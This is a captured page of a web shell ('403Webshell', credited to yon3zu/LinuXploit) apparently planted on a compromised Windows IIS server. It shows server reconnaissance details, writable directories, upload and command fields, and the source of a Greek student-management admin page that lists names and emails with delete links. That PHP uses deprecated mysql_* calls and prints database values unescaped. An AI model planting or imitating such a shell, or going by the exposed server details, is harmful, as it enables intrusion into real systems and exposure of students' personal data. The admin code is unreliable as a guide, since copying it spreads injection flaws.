403Webshell
Server IP : 195.130.67.5  /  Your IP : 216.73.217.154
Web Server : Microsoft-IIS/10.0
System : Windows NT WEBSERVER1 10.0 build 17763 (Windows Server 2016) i586
User : IUSR ( 0)
PHP Version : 7.4.19
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/Old Sites/dastafiles/admin/functions/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : C:/Old Sites/dastafiles/admin/functions/manage-local-students-no-sex.php
<h2>Διαχείριση φοιτητών τοπικά (χωρίς φύλο)</h2>

<table id="rounded-corner">
	<thead>
		<tr>
			<th>ID</th>
			<th>Ονοματεπώνυμο</th>
			<th>E-mail</th>
			<th>Ημερομηνία δημιουργίας</th>
			<th></th>
			<th></th>
		</tr>
	</thead>
	<tbody>

<?php

$user_d=mysql_query("SELECT * FROM user WHERE sex IS NULL OR sex=0 ORDER BY madeat DESC, surname ASC, name ASC");

while($user_i=mysql_fetch_array($user_d))
		echo'<tr>
			<td>'.$user_i["id"].'</td>
			<td>'.$user_i["surname"].' '.$user_i["name"].'</td>
			<td>'.$user_i["email"].'</td>
			<td>'.$user_i["madeat"].'</td>
			<td><a href="?p=view-local-student&id='.$user_i["id"].'"><img src="images/view.png" /></a></td>
			<td><a onclick="if(!confirm(\'Είστε σίγουροι για τη διαγραφή;\')) return false;" href="?p=delete-local-student&id='.$user_i["id"].'"><img src="images/delete.png" /></a></td>
		</tr>';
?>

	</tbody>
</table>

<?php

require_once("lib/datatables.php");

?>

Youez - 2016 - github.com/yon3zu
LinuXploit